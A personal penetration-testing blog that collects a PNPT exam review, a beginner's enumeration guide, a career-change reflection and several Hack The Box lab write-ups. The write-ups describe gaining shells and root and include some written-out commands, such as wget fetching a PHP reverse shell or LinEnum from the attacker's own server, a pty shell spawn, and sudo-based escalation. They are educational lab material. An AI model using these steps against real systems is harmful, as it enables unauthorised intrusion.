My Experience Taking the PNPT (Practical Network Penetration Tester) Certificate

In April, I got a huge surprise when Heath Adams (also known as The Cyber Mentor), founder of TCM Security and creator of TCM Academy contacted me asking me to beta test his new penetration testing certificate. Although I was surprised that I was chosen to beta test, I was not surprised that Heath was making a certificate. His courses have helped thousands of people and it seemed like, after the academy, a great addition to that would be a certificate.

I just want to state prior that I do not have any other cybersecurity certificate, other than the PNPT. I cannot make comparisons against the OSCP or the eJPT.

My Overall Experience

As I mentioned above, I first did this certificate in April and made it to day 5. However, I woke up on day 5 to find out that my mother had passed during the night. Heath was very kind about the situation and told me I could retake the exam once I felt ready to do so. Knowing what I know now, I never would have passed the first time I took the certificate. In the meantime, I went to Canada to help my father with my mother’s passing. Once everything slowed down, I re-scheduled my exam.

In terms of scheduling, you pick a date and time. From that date and time, you have 5 complete days to compromise the domain controller. You are given an OVPN file and the Rules of Engagement (that are super clear) via email the moment your exam begins. At no moment during the testing did I have any problems with the technology. I personally needed almost all of the five days, but I can see how those with a lot of experience could complete the certificate sooner. Throughout the 5 days, Heath was always accessible if I had any questions.

Although I cannot make comparisons to the eJPT or the OSCP, I can say that this certificate feels like a penetration testing engagement you would see in the real world. The emphasis here is really on the practicality. You conduct OSINT, do an external and then move onto an internal penetration test where you have to compromise the domain controller. Even the way you go about exploiting, to me, feels like something that would really happen in a real company’s network.

In addition to actually exploiting all of these systems, you have two days to write a penetration testing report and then, after, conduct a debrief, enhancing the practicality of the certificate. I took great care writing the report and prepared a PDF for the debrief. I wanted both to represent what I would do in an actual job. During the debrief, Heath gave me feedback that I could use to improve those also.

Recommendations for Test-Takers

The first thing I recommend is, if you do not have work experience as a penetration tester, make sure you complete all of Heath’s courses on the TCM Academy and take detailed notes. At this moment, you can purchase a bundle with all courses. Everything you will need to pass is either explicitly shown in his course, or alluded to.

Note that, depending on your skill and experience, you may need to take the complete 5 days. I was lucky because, since I work as a higher education instructor, I was in between semesters. I would say I worked for sometimes 15 hours a day on this certificate. Again, some other people took way less time than me to complete the certificate.

What Could Be Improved

I think the ONLY suggestion I would make to improve the experience would be for Heath to expand TCM Academy a bit. As I mentioned, everything on the exam was explained in his courses, or was alluded to at some point. However, although we make labs in PEH and exploit Hack the Box and Try Hack Me boxes, they are not exactly what you could see on the exam.

I think that, like eJPT, the PNPT could have a few practice exams (that could be purchased?) to get some more practice in some specific aspects you see on the exam. I feel like, although I understood the course material, I had a hard time practicing outside of the course.

Concerns About Adoption?

I think some people may be concerned with the adoption of this certificate. Since the certificate is so new, you may think it may better serve you to take the eJPT or just wait to take the OSCP. In all honesty, I disagree. Given that Heath is very well-known in the field and given the practicality of the certificate, I do see that the PNPT will very quickly be adopted by companies in the future. Even if you disagree, the learning curve I went through while taking the certificate was extensive, and I learned so much in just 5 days. This was the first time I REALLY became a pentester, and I was able to feel this during the certificate.

Final Thoughts

Overall, I loved my experience taking the PNPT. I never thought I would pass. I would not even have TAKEN the PNPT yet if Heath did not contact me. On Day 4 I resigned myself to not passing, but I would get as far as I could anyway. Day 5, at 5pm, I was able to compromise the domain controller. I spent 5 days banging my head on the table, but felt such elation when I solved the problem, only to be followed by another challenge. Eventually, I passed the PNPT.

The entire certificate process was extremely clear and was formatted in a practical way that gave me the confidence to know that, if I would get a penetration tester job, I have the skills to compromise systems, write a report and effectively explain my report to clients. I had no issues with technology. Although I cannot compare the PNPT with the eJPT or the OSCP, I do think it is a worthwhile certificate to obtain.

For test-takers – make sure you take all of Heath’s courses and write excellent notes. Also be aware that, depending on your skill level, you may need the 5 complete days.

The only thing I would add is perhaps more practice prior to the exam with certain aspects. Hopefully that could come in the future.

I want to thank Heath one more time for asking me to beta test the certificate and then allowing me to re-take the exam. Thank you for answering all questions I had during the certificate also. It was invaluable.

How I Enumerate in Pentesting

Hello everyone! In this post, I am telling you how I enumerate while doing pentesting on a box on Hack the Box or TryHackMe. Please remember that I would say I am an “intermediate” student. However, if you are a beginner and want easy commands/strategy to begin attacking your first boxes, this is the post for you! This post does not cover any exploitation, but I will show you how to get started finding the information that you need in order to do so.

Ping the Host

First thing’s first. Ping the IP that you are attacking to make sure it works. If it does not, it may be an issue with your VPN, or the box has not completed loading. I would wait 5 minutes if it does not ping back. If, after 5 minutes, the ping does not work, I recommend downloading your VPN file again and trying. If that does not work, restart your machine.

ping <target IP>

Nmap

I always begin my enumeration using different nmap scripts. Here are the commands I do.

Note that you may receive an error saying to add “-Pn” to the command. Do it!

nmap -T4 -p- <target IP>

I use this script. It checks ALL ports, so it takes a bit of time. I do this to make sure my initial scan did not miss any ports.

nmap -A -T4 -p80,22 <target IP>

The above code attacks the specific ports that you find in your previous scans, but finds more in depth information. Your ports may not be 80 and 22. I just wanted to show you the format of the ports.

Lastly, I like doing an nmap script for vulnerabilities on all of the ports to see if any exploits are found. This makes your work easier on you!

nmap --script vuln <target IP>

Enum4Linux

I like to run enum4linux if the target machine is a Linux system. Here is more information on enum4linux: https://tools.kali.org/information-gathering/enum4linux.

enum4linux <target IP>

Port 80

If port 80 is open, I usually run dirb before running dirbuster. Dirb will find basic directories that I can begin evaluating as I do a dirbuster attack. Dirb finds directories on port 80. I would suggest running dirb on every directory that you find. For example, scan <target IP>, then scan <target IP/admin> if that directory shows up. This is not a very quick system and you can do better with other tools, but it is an initial start compared to the more heavy dirbuster and ZAP programs.

Also, enter the IP in the browser!

For example, <target IP:port> to see what is on the page. You can inspect the page to see if we can find version information anywhere, which will help in the exploitation phase.

I also recommend downloading the extension on Firefox WappAlyzer. This extension can tell you what the page is using (for example, Apache 2.1.4). Then, you can look up exploits for this!

Some More Tools for Port 80

If you have a port 80, there are some other tools you can use for enumerating.

You can run:

nikto -h <ip>

The above command pulls the server header, versions, etc.

The next tool I recommend is dirbuster. With dirbuster, you can find not only directories, but also other files. Dirbuster is already on Kali Linux. I like using the GUI so, in the search section on Kali, I just type “dirbuster” and open the program.

Here are some instructions for how to use dirbuster:

  1. Put the target IP (and port) into the “Target URL” section. Remember, if you have other ports, like RPCs, you should run a different scan on that port.
  2. Click “Go Faster” to increase the threads.
  3. You will need to insert a wordlist file. I recommend using the medium list on dirbuster. This is located in /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.
  4. Check mark “brute force directories”, “files”, and “be recursive”
  5. If there is a specific directory you want to look in (for example, a hidden directoy) enter it under “Dir start with”. For example, “/admin”.
  6. Enter different file extensions to look for: php, asa, sql, zip, tar, pdf, txt, bak.
  7. Begin the scan!

Once dirbuster has completed, I then run OWASP Zap, which is also part of Kali Linux. In OWASP Zap, you can use “Attack Mode” to run a spider on a web page. This is another way to find directories, which I do in addition to dirbuster, just in case something gets missed. Here is a page to help you to run this scan: https://www.softwaretestinghelp.com/owasp-zap-tutorial/

Lastly, I like to run is “curl –head <target IP>”. This finds more information on port 80 (i.e. other directories, etc.)

What Next?

Well, once you have finished your enumeration and have found all of the files, directories, ports, services running, etc. You now have a master list of things on which to look for exploits. For example, if an Apache server is running and you have the version, look in searchsploit, exploit-db or just in Google an exploit for that. If you have port 22 open, you can research how to exploit port 22. However, you need to know WHAT you have on the system before you can exploit it.

Conclusion

As I mentioned at the beginning of this post, I am an intermediate learner. There are probably still tools and other ways of enumerating I have yet to learn. However, if you are a beginner, this is a good list to begin your pentesting learning. Although you may not become an expert at enumeration with this post, I hope it is invaluable to you for helping you begin the enumerating process.

Hack The Box – Beep

Introduction

In this write-up, I will be showing how I owned the box Beep on Hack the Box. This is a recommended box for future OSCP takers to complete to improve their skills. My previous boxes were for the mid-course capstone for the Practical Ethical Hacking course by The Cyber Mentor. However, since I still have more time on my Hack the Box membership, I will begin completing more recommended boxes for the OSCP. I finished this box a few days ago, and I want to show how I completed it. This write-up will include how I enumerated the machine, how I exploited the machine, and how I escalated my privileges to get the user and root flags. Throughout, I also show the difficulties I had and how I overcame them.

Enumeration

As other nmap scripts were running, I first found the version for Apache. Although I did not know yet that port 80 was open, I definitely knew there was something on this port.

After, my results came in on nmap. Wow, that is a LOT of ports!

After checking SSH and port 25 in the browser, I decided to go check on port 80. I had to approve a certificate, and then got moved to port 443, leading to the page below. A log in page – great. I added elastix to the already long list of programs I should check for exploits.

Once I was done checking every port in the browser for information, I looked for exploits for EVERY service above using searchsploit (I am trying to avoid Metasploit, when possible) and found 10 different exploits that could work.

I eventually got to exploit 18650.py, which requires you to create a netcat listener, change the python file to reflect the target’s IP, your local IP and your local port. Once I made these changes, I ran the python file and got the following error:

I was wondering why I had this error so I Googled it which, of course, led to a write-up for this box. One of the users said that you had to figure out the “extension” bit of the code by typing the following and change it in the python file. Then, you add some more code. This is to override the certificate portion we encountered at the beginning. Please see the write-up for the code.

Then, I got THIS error and realized, after pinging the host, that the Destination Host was unreachable.

I left for a few hours, thinking that the error had something to do with the box, and I had the same error. I searched online and found that it was probably due to my VPN file. I re-downloaded it and then it worked again! Phew! Now, back to the above error regarding the certificate override. I was finally able to run the code and change the “extension” portion. Now I got this error:

I went back to my Python file and got the above error. Clearly I was in for an error-filled night. I looked this error code up and found that I needed to change my /etc/ssl/openssl.cnf file.

Once this change was made to my own Kali settings I ran the python file. I FINALLY GOT THE SHELL!

I upgraded my shell and found I was “asterisk”. I immediately tried the root folder, which I clearly did not have permission to use. I just made my way then to the user folder and got the user flag.

Privilege Escalation

Now that I was in and had the user flag, I needed to escalate my privileges to get the root flag. I first put the script LinEnum onto the machine by going into the /tmp folder and, first, going onto my Kali system terminal and create a python server. This requires to have LinEnum downloaded onto your machine first.

sudo python -m SimpleHTTPServer 80

Then, I went onto the target machine’s shell and typed:

wget http:<myIP>/LinEnum.sh

I did find some information, which I saved onto my computer. Here is some of the information:

The one I was most interested in above was the /usr/bin/nmap file. I tried running:

nmap --interactive

which did not work. SPOILER ALERT: You will see what I did wrong later…

I also ran:

sudo -l

which showed me the services “asterisk” could use.

I was unsure how to exploit these, except for nmap, so I decided to look at write-ups. This writeup suggested I change the permissions of /bin/chown to get root, using the code below. This did not work for me as you can see. Then… I saw my mistake with the nmap code I ran below. I forgot sudo. Now I felt dumb.

AND IT WORKED! I got the root flag!

Conclusion

In conclusion, this box gave me quite a few challenges. I learnt quite a few lessons. I was able to practice my troubleshooting skills with this box, which I am usually good with. I am very happy I did not need Metasploit to own this box. I learnt to add sudo before the nmap code. Overall, this box was very informative. There are other ways to own this box, including using vTigerCRM. I would look at other write-ups to see how others were able to accomplish this. One write-up, in particular, uses multiple methods to exploit vTigerCRM. It is worth a look.

Until next time,

Melanie

Hack The Box – Lame

Introduction

In this post, I am covering how I broke into the box Lame on Hack the Box. I have broken into this box as per the mid-stone capstone for the course Practical Ethical Hacking by The Cyber Mentor, and this was my last box to complete! I had some difficulties with connecting to this box for the past several weeks, but I was able to accomplish my task today!

Also, I am very happy that I remembered to take good screenshots today!

Enumeration

The first thing I did was enumerate the target with nmap and found the following ports open.

Since I see that this is a linux machine, I ran enum4linux to see if I could find anything else. I found some shares! I thought that this might be useful, and I also noticed again the Samba 3.0.20-Debian. I was really tempted by the tmp file, and noted it for later also.

I also found some interesting information about ftp through another nmap script:

Exploitation

Once I enumerated all of the ports, I decided to start looking for exploits. First, I looked for exploits using searchsploit to try to avoid using Metasploit since the OSCP does not allow you to use Metasploit much. Then, I looked for exploits in Metasploit.

As you can see above, I looked for the various services to see if there were good exploits. Usually I look for remote code executions, but this time I looked at any exploit that seemed interesting. By looking through searchploit for every service, I found 5 python scripts that could work and 1 metasploit script. I tried each python script first, but none seemed to work. So, I decided to check out exploits in Metasploit. I first looked for a samba exploit given that this was the result I obtained from my searchsploit search.

I took a look at the exploits marked “excellent” and checked them out. The first one was an “Arbitrary Module Load”, which I did not understand, so I moved on for now. I would go back to it if I needed to. The next one was a “username map script”. I thought this could be useful to find usernames, so I tried this one.

Once I entered the options and exploited the machine, you can see I got a shell! And I had root! I was not expecting that.

So, clearly it was easy to find both the user.txt and the root.txt files.

Conclusion

With this box I really wanted to be more patient and enumerate EVERYTHING. I wanted to be patient and check every possible exploit. Without this strategy, I probably would have not tried the exploit from above. I would have looked for an RCE, which I would not have found immediately. Thankfully, taking more time and not rushing really allowed me to explore files. Looking at the user, “makis” files, I saw a few more possibilities I could have tried to get to root, but I was really lucky to find this exploit. Also, note that I started automatically just using “ls -la”! Yay!

Hack the Box – Bashed

Introduction

Hello everyone! Welcome to my writeup for the box Bashed! This box was a tough one for me. For the privilege escalation, I definitely had to use a writeup in order to accomplish this task. Even then, I am not even sure I could redo this box with a different scenario! Either way, I am showing you here what I did, though I recommend following the writeup linked below. It will be MUCH more helpful than I can be.

I am doing this box as part of the mid-course capstone for the course Practical Ethical Hacking by The Cyber Mentor. Later, I will watch the video for this box with his explanation and hopefully I will understand it more.

Writeup Used: https://resources.infosecinstitute.com/topic/hack-the-box-htb-walkthrough-bashed/

Enumeration

The first thing I did was run my basic enumeration (I will make a post explaining how I enumerate), and found the following ports opened.

Once I did my scans, I went to the webpage where it explicitly talks about the exploit phpbash (a github link). I downloaded this .php file for use in the future. I imagine that, if I am able to upload a .php file in the future, I could upload this phpbash.min.php file to the webpage to run this terminal in the window. However, if I can upload a file, couldn’t I just upload a reverse shell? The github says you use this file when you cannot do a reverse shell, but I am unsure when that would be the case. Comment below if you know!

Exploitation

Once I found the location of the phpbash.min.php file while going through the directories (found using dirb) on port 80, I opened the file in the browser. A note – you can use phpbash.php as well, though it did not work for me. An interactive web shell!

I was able to go around everywhere here and find the user.txt file.

At this point, I wanted to get a shell on my own terminal because I could not access the /root file, and you cannot do so through this interactive web shell. So, I thought best to upload a php reverse shell into the target machine to open it up!

The first thing I did was create a python server. Then, I uploaded the php-reverse-shell I downloaded a while back from Pentest Monkey (you have to change the LHOST and the LPORT in the file first!). Then, I used the following command to upload the file in the interactive web shell in a location with write privileges (ended up being the uploads folder): wget http://<MYIP>/php-reverse-shell.php. I then made a netcat listener with the port that I included in the php-reverse-shell.php file.

Once there, I opened the file location in the browser and got a shell on my system!

Privilege Escalation

The first thing I did was run sudo -l (though I should have done “id” first) to see privilege. This privilege escalation was where I needed help from a writeup (listed above).

With sudo -l, you find out that this user can run scriptmanager. After looking around the directories and files, I found it. As per the writeup, you have to run the command “sudo -u scriptmanager /bin/bash”, which causes me to change the user to scriptmanager. I then also improved my shell using the command below: “python -c “import pty; pty.spawn(‘/bin/bash’);”

Okay, this next step did a number on me and I completely followed the writeup I posted above. I went back to the main directory list and did “ls -la” to see the permissions. Since I am now scriptmanager, I see that I have permissions for a folder called “scripts”. Once I get there, there is a .py and .txt file. The .py file writes to the .txt file, which is root. According to the writeup, the file runs every minute, which I see in the permissions when I used “ls -la”.

At this point, the writeup above explains that you can use a python script from Pentest Monkey, which will create a reverse shell once you edit its contents to include the lhost and an lport. I FORGOT TO SCREENSHOT THIS SO PLEASE LOOK AT THE CONTENTS IN THE WRITEUP! There is an image with the code.

I started a netcat listener with the port I put in the python file. In the scripts folder (since I have permissions), I uploaded the python file using “wget http://<MYIP>/<MYPYTHONFILE>&#8221;. After about a minute, I got a shell with root! At this point, I was able to get the root flag!

Conclusion

I NEED to get better at taking screenshots. I know that, in the OSCP, I have to be good at this. I think that I might do an interval timer during my next box (finishing off with Lame!) every 10 minutes and I will take a screenshot of my progress then, or something along those lines. My problem appears to be that I get so engrossed in solving the problem and trying things, I forget to take screenshots!

I also know that I will have a hard time replicating this box. I understood the mechanics described in the walkthrough and why they did what they did, but I am quite certain I would not be able to identify these steps and complete them in the future on my own. I will continue working and hopefully this walkthrough helped me, but it feels like I hit a wall without knowing how to go above it, because I do not want to just go around it and avoid the learning. Hopefully I will understand it more in the future and after watching The Cyber Mentor’s explanatory video that he provides in his course Practical Ethical Hacking.

How I solved Hack The Box’s Netmon (Successes and Failures!)

Introduction

In this writeup, I am going to be showing you how I solved the box Netmon on Hack The Box. I definitely could not solve this box without a writeup, but I will show you what I did and the resources I used to solve this. This is part of the mid-course capstone from The Cyber Mentor’s Practical Ethical Hacking course.

Enumeration

So, the first thing I did was run an nmap scan to find the open ports. I personally dislike enumerating port 80, so I wanted to figure out if I could own this box WITHOUT having to look at port 80. I was wrong, haha.

Exploitation

I first began with port 21, with FTP because it is possible to sign in anonymously with FTP (user as anonymous and password as anonymous). This ended up working! Going through all of the files, I was able to find the user.txt file. A note: ALWAYS REMEMBER TO DO ls -al, not just ls!!!! It took me a while to find the files I was looking for because most of the files were hidden. I need to try to get out of that habit!

The issue I was running into was getting into the Administrator file. I was getting a 550 error code, which meant that this ftp route was not going to get me the root.txt file. However, upon looking at a writeup, I found out how to get credentials for the PRTG Network Monitor (on port 80). What you have to do is find the PRTG Configuration.old.bak file. In this version of Windows, this can be found in “ProgramData/Paessler”. This is my point from above. ProgramData was hidden, so I could not find anything! Once I figured that out, I found the file required and did a “get” command to put it on the computer. I opened the file on Kali with “gedit” and searched until I found “dbpassword”

At this point, I tried the password in PRTG Network Monitor and it did not work. I changed the year posted in the password and was able to get in!

Once logged in, I looked for an upload form on the application to upload a reverse shell. However, I could not find one and used this writeup to find this exploit. The author did not explicitly show them using this exploit, but rather a different script, but the exploit ran well enough for me. I felt foolish here because I definitely could have looked this up for myself. So, I cloned the git file and opened the file to see how to use it.

As you can see below, once I ran the exploit I got a shell immediately.

I did not do anything else except move to the Administrator folder and I was able to get the root file!

This write-up here shows another way that this could have been done. I wrote it in my notes just in case the above method does not work.

Conclusion

In reality, I am a little bit disappointed in my ability to own this box. I was able to get the user.txt file quite easily. However, as soon as I had to use a web application, I tripped over myself. I am unsure why port 80 is always so difficult for me, but I guess I am always just boosting my skills and trying to improve. I am happy that I could understand the write-ups well enough to be able to solve the issue, but it did feel like a bit of a step back and a hit to my confidence.

Grandpa – Hack The Box

Introduction

In this writeup, I am talking about how I was able to get both the user and root flags for this Hack the Box box. I did this as per The Cyber Mentor’s Practical Ethical Hacking course for the capstone project. However, I want to disclose that I was working on the box “Bashed” before this and I gave it up. I got partway, got stuck, looked at a writeup and became confused. So I decided to leave it and come back to it after watching The Cyber Mentor’s video explaining the box. However, I am very proud of my progress on this box, though I felt bad that I could not solve Bashed. Either way, I hope you enjoy this writeup!

Enumeration

As per usual, I enumerated the machine using nmap and other scripts.

Given that port 80 was opened, I went to the browser and looked at the page. After inspecting the page and running dirb, I realized that I was a bit stuck. After I ran nikto, I noticed some things: like webDav was being used. Not like I knew what that meant.

Exploitation

After enumerating, I decided to search for exploits for the different services running. This one seemed interesting, given that I had noted that webDAV is being used. The instructions seemed simple, so I tried it out!

As per the author’s instructions, I did the following:

And I got a shell! However, I could not do much. I could not even get into the user, Harry’s, folder! At this point, I decided to use “search suggester” (one of my favorite tools!) to see if there is an easy exploit to get into the machine.

I tried the different exploits, but noticed in both that they both had the same “Operation failed” error. I decided to look up the error, and I found this writeup for “Granny” – another box: https://blog.barradell-johns.com/index.php/2019/07/27/htb-granny/. I noticed that this exploit also says “Exploit completed, but no session was created” and realized (from the above writeup) that, in this case, I could migrate to another service and I could probably get system!

So, I migrated to 1828 and, when I opened meterpreter again, I got system!

At this point, I did not even have to do privilege escalation! I had access to everything!

Conclusion

In conclusion, this box was not too hard for me. It was a bit of a confidence booster, given my failure of the “Bashed” box. I did get tripped up a bit when an exploit did not work, but it was a good lesson about migrating. I saw this process in a course I did with The Cyber Mentor (on YouTube for free), but I did not 100% understand it. Now I understand the application. How great!

Optimum – Hack the Box

Introduction

Hello everyone! I am continuing on my journey to the OSCP by doing the mid-course capstone boxes in the Practical Ethical Hacking course by The Cyber Mentor. This time, I was working on the Optimum box. I am so proud to say that I did not need ANY WRITE-UPS to complete this box! This is because I have already learned through a Try Hack Me box how to exploit HTTPFileServer version 2.3. In this blog post, I will show you my steps for escalating to root and obtaining the root and user flags through enumeration, exploitation, and privilege escalation. I will also show parts that I may have gotten wrong.

Enumeration

As always, I began with my normal nmap scans. The only port found was port 80.

When I see a port 80, I first look at the webpage. I noticed here the version with the login page. I also inspected the content of the page and noticed that HTTPFileServer was from Rejetto. At this moment I remembered I exploited this before. So, I knew that I could exploit this page or try to brute force the log in or log in with default credentials.

Exploitation

The first thing I did was try the exploit I had used in the past using my notes. I used the command “searchsploit http file server rejetto” and found the .py file I had used before. I searched my exploit folder that I created with exploits I have used in the past and found the rejetto one. I opened up the .py file with gedit and looked for the places that required changes (LHOST and LPORT) as well as how to run the .py file.

As per my notes, I also remembered that I needed to run a netcat listener and a python HTTP server in the same location as the file. Once both of these things run, I ran the .py file with the appropriate arguments, which led me to the user shell.

As you can see from the above photo, I immediately tried finding some information about the system, and I realized I was using meterpreter commands. I figured that, after I found the user.txt file, I would jump to meterpreter anyway because they have a “search suggester” command, which looks for exploits related to my machine.

In order to change my netcat shell to a meterpreter session, I made the following msfvenom payload using my LHOST and an LPORT.

Then, I opened Metasploit and made a listener using the same port and payload as the msfvenom payload. I made sure that I also had a Python server running in the location of the optimum.exe payload file I created.

From there, I used Powershell to download that file into the netcat shell and ran the file.

Once I had the meterpreter shell, I used my meterpreter commands to get more information. Then, I backgrounded the session and ran “search suggester” and ran it on my backgrounded session. This then gave me 2 exploits, seen at the bottom. I ran the first exploit, which did not work. Then I ran the second one, which did work!

As you can see, I got NT AUTHORITY\SYSTEM!

After that, I clearly got the root flag!

Conclusion

I am so proud that I was able to get the root flag using my previous notes. I finished this box in a record time also. Another thing I did do was remember how to upgrade my netcat shell and do so to get root easily. Just a final message to you all: keep going! One day you will realize you know more than you think.

My Career Change Strategy to Become a Pentester

I decided early this year that I wanted to become a pentester. Although I had an inkling in 2019 that this may be a field that I want to get into after determining that my current career is not my dream career, I really began to make moves in the field in January of 2020. Now that it is the end of the year, I wanted to reflect on how my journey began, how it developed over the course of this year, and what I am now doing in order to satisfy my dream.

Let me begin with a bit of my history.

I finally graduated and began my career in my chosen field in 2018. I have a degree in Hispanic Linguistics and, after moving the the U.S. with my then fiancé because he got a job, I was unable to immediately find a job teaching at a community college. During my Master’s degree, I wanted to do exactly that, but the opportunities of where I live are extremely limited. So I went back to school to do a Master’s in Communication since I thought it would be easier to get a job. After I graduated this degree in December 2017, I began my job search and found teaching jobs in March of 2018. At the beginning, everything was great. However, over time I realized that I was not in love with the field. The career is okay (not enjoyable), but it is limited and my growth opportunities do not sound appealing to me. I realized I was unmotivated, uninspired, and struggling to get work. I was struggling for a career and job that I do not love and that I began to dread when I woke up in the morning. So, in 2019, I realized that I wanted to make a change. However, not only did I not know what I wanted to do, but I am also very limited in the work I can do here in the U.S.

After deciding that my current career is not for me, I decided to take courses in anything I found interesting through Lynda or Udemy. This included programming, reiki, and I even began a course in cybersecurity. I was mostly dabbling in anything whenever I had time, but the cybersecurity and programming was interesting to me. The pay and the lifestyle also began calling me. However, I really did not make any moves in the field until January 3, 2020 during the holiday season. I was bored, and on Twitter, and I read about the #100DaysofCoding challenge. I decided that I would try it because I was wasting time in a job I disliked. I decided that if I wanted the change to happen, I had to actually DO something.

And I completed the challenge. I did HTML, CSS, and Javascript courses. Although I did not do something daily because of my work schedule, I was pretty consistent and completed the 100 days probably at 120 days into the year. However, during these 120 days, a course showed up on my YouTube feed, which was “Full Ethical Hacking Course” by The Cyber Mentor. It is a 15 hour course and it peaked my interest after beginning (but not completing) a cybersec course I purchased on Udemy the previous year. Although the course is only 15 hours, it took me a LONG time to complete it because I have difficulty sitting and doing a course. I prefer doing. Although the course has opportunities to follow along, I mostly just took notes because I did not have a membership to Hack the Box or Try Hack Me yet. I did join The Cyber Mentor’s Discord page and started learning a bit more about pentesting. Although it did take me a long time to finish the course, I actually did. And I wanted to keep going.

At this point, I read some advice about completing Try Hack Me boxes and doing paths. I thought it would all be great because I had some great notes from the 15 hour course. Little did I expect, pentesting is not easy. But it was addicting. I would spend hours working on a box, trying to learn and also trying to figure out how to solve everything. I have taken diligent notes for the different boxes as well as different methods. I finished the Basic path and began working on the Offensive path. But work began getting in the way and I had little time to spend towards these boxes. Sometimes they would get complete, but other times it would take me weeks to find the time to complete a box, especially with the changes at work due to the Covid pandemic.

I started listening to career change podcasts (like “Happen to Your Career”. From one of their podcast episodes, I realized that I need to try immersion, which is to find points in my day where I can easily add moments of work/study. I changed my schedule to easily add these moments: I listen to a podcast during my dog’s walk, I network via Twitter while drinking my morning coffee, I read a pentesting book/article during my afternoon coffee, and at 5pm I stop working and immediately start either hacking a box, writing an article, or watch a course video (currently taking The Cyber Mentor’s full Practical Ethical Hacking course, which is 25 hours long) until 6pm. If I have more time at night, I will do more than the 40 minutes. If not, I have already structured some time in my day to continue learning.

In 2020, I have therefore decided upon my new career, learned some programming skills, hacked quite a few boxes, done learning paths on Try Hack Me, read books, met people in the field, learned from people on the Discord and watched courses. Most importantly, I found something that I love to do. I want to improve upon my immersion plan in 2021, finish The Cyber Mentor’s courses, and practice the boxes recommend to do prior to the OSCP. Hopefully I can take the OSCP next year or at least change jobs into a more related field. I appreciate all of the help my mentors and experts have given me this year, and I hope I meet more of you in 2021!

Hack The Box – Nibbles

Introduction

I completed this box as part of the midcourse capstone project for the “Practical Ethical Hacking” course by The Cyber Mentor on my journey to the OSCP. This box was quite difficult for me, although not in terms of basic knowledge. My difficulties lied in terms of little details, which I will explain. This walkthrough will include my successes and failures, along with the materials I used in order to overcome them.

Walkthroughs Used

https://resources.infosecinstitute.com/topic/hack-the-box-htb-machines-walkthrough-series-nibbles/

https://www.doyler.net/security-not-included/hack-the-box-nibbles

Enumeration

Using my basic nmap scan, I was able to find two ports open: 22 and 80. I did try to SSH into the machine using anonymous credentials, which did not work. I did realize that I should begin then with port 80.

I went into the browser and typed <IP>:80, which led me to a basic “Hello World” page. At this point, I checked the code of the page and saw that there is a directory called /nibbleblog. At this point, I wanted to use dirbuster to find any hidden directories.

I really like using dirbuster because I can look for files with different extensions. This is the first point I ran into difficulty. If you have experience, you will immediately see my error.

With the above settings, I could not find many directories and I was stuck. Looking at the first walkthrough I have linked to at the top of the page, I realized that there was a /admin.php file that I could not see. I realized I must have done some error.

I figured out that it was because I did not have the “Dir start with” to /nibbleblog, so dirbuster was not running on the correct directory. Once I determined this, I was able to find the correct file.

This admin.php lead to a login form, which I knew I was going to try to brute force. I like using OWASP Zap to do this because I can easily fuzz the password.

However, using the dirbuster medium wordlist, no password was found. This is one thing I do not like about Hack The Box. Sometimes the password is not on a password list and the password is related to the box title. I was able to guess the password for admin through this way.

Exploitation

Once I got into nibbleblog, I found the version and noticed it ran with PHP. I then looked up exploits for the version on exploit-db. I found this one:

However, this exploit did not work for me. Metasploit could not create a session, even though I used the same settings that I found online and they seemed to be accurate. So, I then explored the nibbleblog site and found some place where I could upload a file. I knew that, from here, I could create a malicious payload through msfvenom for PHP and try to upload it to the site.

Since I used a meterpreter payload, I used a listener via metasploit, which I have done before.

In the browser, I went to the file location and clicked on the file and, as you can see above, I was able to get a meterpreter shell and was able to get the user flag.

Privilege Escalation

I also noticed a personal.zip file, though the “unzip” command was not working. Many other commands were also not working including “su”, “sudo”, “sudo -l”, “unzip”, “wget” (I was trying to get LinEnum on the machine), “curl” etc. I even tried the above steps using netcat instead and that shell was unstable. I used The Cyber Mentor’s Discord channel and searched for a conversation where people had trouble with their meterpreter shell and found a question by another user who had the same difficulty as me with this box. Another user suggested typing “shell” to spawn a shell. Although this did work for me, the shell was not very responsive and took time. Mostly I spawned the shell whenever the meterpreter shell could not complete the task. When a command did not work, I would spawn a shell and then it would work. This is why you see in the below photo that I opened up to a fourth channel.

Once I was able to get the above shell, I began my list of linux privilege escalation commands I usually try. After I try “su root”, I next always try “sudo -l” and found out there was the “monitor.sh” file, located in the private.zip file. I knew that I had to try to unzip the file again, which worked in the new shell.

Doing the above process, I was able to unzip the personal.zip folder and found the monitor.sh file. I had no idea what to do here. I tried the solution in the first walkthrough linked above, which did not work. So, I looked up another walkthrough which suggested the below solution:

As you can see, adding the above code to monitor.sh and running it allowed me to get root. I was then able to get the flag!

Conclusion

In conclusion, I had quite a few hurdles in this box. First, I was unable to find the directory. Second, I was unable to brute force the password. Third, I could not get the meterpreter shell to work. Fourth, I did not know what to do to the .sh file. However, with the use of walkthroughs and perseverance, I was able to overcome these issues to get the flags.